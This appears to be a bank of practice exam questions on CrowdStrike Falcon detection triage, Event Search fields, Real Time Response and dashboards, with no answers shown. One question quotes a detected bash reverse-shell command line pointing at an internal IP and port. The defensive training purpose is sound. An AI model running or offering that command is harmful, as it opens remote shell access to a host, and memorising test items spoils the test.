What action is needed to ensure Falcon does not block or generate a detection for a process by using the file hash?
When looking at the details of a detection, there are two fields called Global Prevalence and Local Prevalence. Which answer best defines Local Prevalence?
What is the difference between Managed and Unmanaged Neighbors in the Falcon console?
Refer to the image.

In the Full Detection View while viewing the Process Tree you see an attack outlined as in the image above.
Based on what you see, what happened during the attack?
Which Executive Summary dashboard item indicates sensors running with unsupported versions?
During an advanced hunting session, a responder is writing a custom query in the Event Search tool to track the lineage of a suspicious process. They notice a field labeled TargetProcessId_decimal. Which of the following sentences accurately describes the technical significance of this value within the CrowdStrike telemetry ecosystem?
You are reviewing the raw data in an Event Search from a detection tree. You find a DnsRequest event and want to determine whether any other DNS requests were performed by the original process.
Which two field values do you need from this event to perform a Process Timeline search?
An adversary is attempting to disable security features by modifying the system registry. Which of the following native Windows processes is specifically designed to create, modify, and delete Registry keys via the command line?
Your lead analyst instructs you to dump the kernel memory of a Windows system using Real Time Response (RTR).
Which native RTR command best helps you to quickly achieve the task?
A SOC Manager is reviewing the monthly efficiency of the incident response team. They are specifically analyzing how many alerts were handled by each individual analyst and the ratio of legitimate threats to noise to optimize staffing levels. While navigating the Detection Resolutions Dashboard, which of the following metrics would they NOT find, as it is primarily located within the Activity or Executive summary dashboards?
Bulk Search tools have several features in common. Which of the following is incorrect as a feature common to all Bulk Search types?
While investigating a detection, how can you identify all other processes that may have run on the host around the time of an event?
When an organization needs to detect a specific behavior that is unique to their environment, they can create a Custom IOA. Which of the following is NOT required when configuring a custom IOA from scratch?
You are concerned that a compromised user may have run multiple malicious commands across multiple hosts.
What information from Investigate > Search > Users will help you quickly find evidence of this behavior?
While reviewing the ' Detection Method ' field for a high-severity alert, a responder sees the label ' Post-Exploit ' . This terminology is used by CrowdStrike to identify a specific:
Which tool or search type is recommended as the " best search " to use when performing the " Examine what ' s normal for this system " step in an investigation?
When a responder chooses to ' Release ' a file from quarantine because it was determined to be a false positive, what type of allowlist is automatically created in the background?
A responder releases a file from quarantine on a specific workstation. What is the default scope of the allowlist that is created during this process?
From the Detections page, how can you view ' in-progress ' detections assigned to Falcon Analyst Alex?
The User Search results are organized into several categories. Which of the following is NOT a sub-heading in the User Search?
During a targeted investigation into a potentially compromised internal administrative account, a responder utilizes the User Search functionality within the Investigate menu. The goal is to identify if the account was leveraged to drop or launch unauthorized binaries across multiple systems in the environment. Which specific data category is natively visible in the User Search results to facilitate this check?
When analyzing the raw telemetry for a ' DNSRequest ' event, which of the following raw data fields is available to the responder?
Refer to the image.

You are using Advanced Event Search to find the event record for a suspicious network connection.
Using the Event List Interactions button for the event, indicated by the arrow in the image above, which option will show all contextual event data around the process execution being investigated?
What happens when you create a Sensor Visibility Exclusion for a trusted file path?
If a local administrator needs to inspect the quarantine directory directly on a machine, where are quarantine files located on a Windows Endpoint?
Which of the following tactic and technique combinations is sourced from MITRE ATT AND CK information?
How are processes on the same plane ordered (bottom ' VMTOOLSD.EXE ' to top CMD.EXE ' )?


Which of the following sentences best describes the primary use of the ' Hash Executions ' Search (Bulk Search)?
The Falcon console is divided into several modules. Timelines (Host and Process) are technically a part of which Falcon page?
Analyze the following process lineage observed during a detection triage on a Windows 10 workstation:
root > smss.exe > winlogon.exe > userinit.exe > explorer.exe > windows_media_player_y35s21-4ak.exe.
Based on the fact that the suspicious process originated from the user ' s desktop shell environment (explorer.exe), what is the most likely entry vector for this attack?
Executive dashboards provide a high-level view of security. Which of the following CANNOT be seen from the Executive Summary Dashboard?
CrowdStrike provides ' Overwatch Best Practices ' for triaging alerts. According to these guidelines, what is the next step a responder should take immediately after the ' Understand the detection ' step?
You found a list of SHA256 hashes in an intelligence report and search for them using the Hash Execution Search. What can be determined from the results?
Responders often use Process Explorer to visualize process behavior. Which of the following is NOT a valid way to pivot to a Process Explorer view?
When examining raw event data, what is the purpose of the field called ParentProcessld_decimal?
When reviewing open detections, what method should be used to identify the most relevant related information in the environment?
How long does detection data remain in the CrowdStrike Cloud before purging begins?
Refer to the image.
Command line:
/bin/bash -c sh -i > & /dev/tcp/172.17.0.21/4444 0 > & 1
File path:
/bin/bash
You receive a detection on the Bash process indicating the command line in the image above.
Based on the command line, what is the next step you should take?
A responder is looking at event telemetry and sees an event named ' ProcessRollup2 ' . Which sentence best describes what this event type represents?
Which of the following statements about the ' Detection Activity ' report is FALSE?
Falcon uses specific identifiers to track processes across the environment. Which of the following sentences best describes what the ' TargetProcessId_decimal ' raw data represents?
What must be true about a custom script before it can be executed from within a Fusion SOAR Workflow?
An analyst notices a detection that has been automatically flagged with the ' New Activity ' status. Which of the following statements best describes what this status indicates?
In the Falcon console, detections can be automated or manual. Which of the following options represents a manual detection?
In various telemetry events like ' FileWrite ' or ' NetworkConnect ' , Falcon identifies the process that performed the action. Which field will always identify this " acting " process?
To maintain a logical flow during an incident post-mortem, CrowdStrike recommends describing adversary activity using a specific three-part sentence structure. Which combination best completes this sentence: " The adversary was trying to [1], by [2] , using [3] " ?
Detections in Falcon are classified by their origin. Which of the following is NOT a recognized type of detection?
Filtering the ' Detection Activity ' report is useful for identifying specific threats. Which of the following filters can not be used on ' Detection Activity ' ?
When navigating the ' Custom IOA ' creation wizard, a user must select a rule type. Which of the following is NOT a valid IOA rule type available for selection?